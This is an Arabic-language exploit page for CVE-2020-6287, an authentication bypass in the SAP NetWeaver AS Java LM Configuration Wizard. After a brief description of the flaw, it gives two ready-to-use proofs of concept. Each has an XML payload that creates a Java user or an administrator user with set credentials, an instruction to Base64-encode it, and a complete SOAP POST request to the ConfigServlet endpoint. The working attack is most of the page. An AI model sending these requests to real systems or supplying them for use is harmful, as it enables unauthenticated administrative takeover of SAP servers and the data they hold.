
[CVE-2020-6287] SAP NetWeaver AS JAVA (معالج تكوين LM) تجاوز المصادقة (إنشاء مستخدم Java بسيط & مدير)
[CVE-2020-6287] SAP NetWeaver AS JAVA (معالج تكوين LM) تجاوز المصادقة (إنشاء مستخدم Java بسيط ومستخدم إداري)
SAP NetWeaver هي منصة التكنولوجيا المتكاملة من SAP والأساس التقني لجميع تطبيقات SAP منذ SAP Business Suite. SAP NetWeaver هي منصة تطبيقات وتكامل موجهة نحو الخدمات توفر بيئة تطوير وتشغيل لتطبيقات SAP، ويمكن استخدامها أيضًا للتطوير المخصص والتكامل مع التطبيقات والأنظمة الأخرى. SAP NetWeaver AS JAVA (معالج تكوين LM)، الإصدارات 7.30, 7.31, 7.40, 7.50، لا تقوم بإجراء التحقق من المصادقة مما يسمح للمهاجم دون مصادقة مسبقة بتنفيذ مهام التكوين لتنفيذ إجراءات حرجة ضد نظام SAP Java، بما في ذلك القدرة على إنشاء مستخدم إداري، وبالتالي المساس بسرية النظام وسلامته وتوافره، مما يؤدي إلى فقدان التحقق من المصادقة.
GET /CTCWebService/CTCWebServiceBean?wsdlإثبات المفهوم (PoC) 1إثبات المفهوم (PoC) 2CVE-2020-6286إثبات المفهوم (PoC) 1: إنشاء مستخدم Java بسيط
الحمولة (Payload)
<root>
<user>
<JavaOrABAP>java</JavaOrABAP>
<username>pentestuser</username>
<password>v3rystr0ngp@ssw0rd</password>
<userType></userType>
</user>
</root>
قم بتشفير الحمولة أعلاه إلى Base64 وأدخلها في حقل <BASE64_ENCODED_PAYLOAD_HERE> في الطلب أدناه
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
<soapenv:Header />
<soapenv:Body>
<urn:executeSynchronious>
<identifier>
<component>sap.com/tc~lm~config~content</component>
<path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
</identifier>
<contextMessages>
<baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
<name>userDetails</name>
</contextMessages>
</urn:executeSynchronious>
</soapenv:Body>
</soapenv:Envelope>
إثبات المفهوم (PoC) 2: إنشاء مستخدم Java إداري
الحمولة (Payload)
<PCK>
<Usermanagement>
<SAP_XI_PCK_CONFIG>
<roleName>Administrator</roleName>
</SAP_XI_PCK_CONFIG>
<SAP_XI_PCK_COMMUNICATION>
<roleName>ThisIsRnd9326</roleName>
</SAP_XI_PCK_COMMUNICATION>
<SAP_XI_PCK_MONITOR>
<roleName>ThisIsRnd5031</roleName>
</SAP_XI_PCK_MONITOR>
<SAP_XI_PCK_ADMIN>
<roleName>ThisIsRnd9846</roleName>
</SAP_XI_PCK_ADMIN>
<PCKUser>
<userName secure="true">pentestuser</userName>
<password secure="true">v3rystr0ngp@ssw0rd</password>
</PCKUser>
<PCKReceiver>
<userName>ThisIsRnd6461</userName>
<password secure="true">ThisIsRnd5525</password>
</PCKReceiver>
<PCKMonitor>
<userName>ThisIsRnd9457</userName>
<password secure="true">ThisIsRnd9037</password>
</PCKMonitor>
<PCKAdmin>
<userName>ThisIsRnd8386</userName>
<password secure="true">ThisIsRnd8477</password>
</PCKAdmin>
</Usermanagement>
</PCK>
قم بتشفير الحمولة أعلاه إلى Base64 وأدخلها في حقل <BASE64_ENCODED_PAYLOAD_HERE> في الطلب أدناه
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6287 PoC
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">
<soapenv:Header />
<soapenv:Body>
<urn:executeSynchronious>
<identifier>
<component>sap.com/tc~lm~config~content</component>
<path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>
</identifier>
<contextMessages>
<baData>BASE64_ENCODED_PAYLOAD_HERE</baData>
<name>userDetails</name>
</contextMessages>
</urn:executeSynchronious>
</soapenv:Body>
</soapenv:Envelope>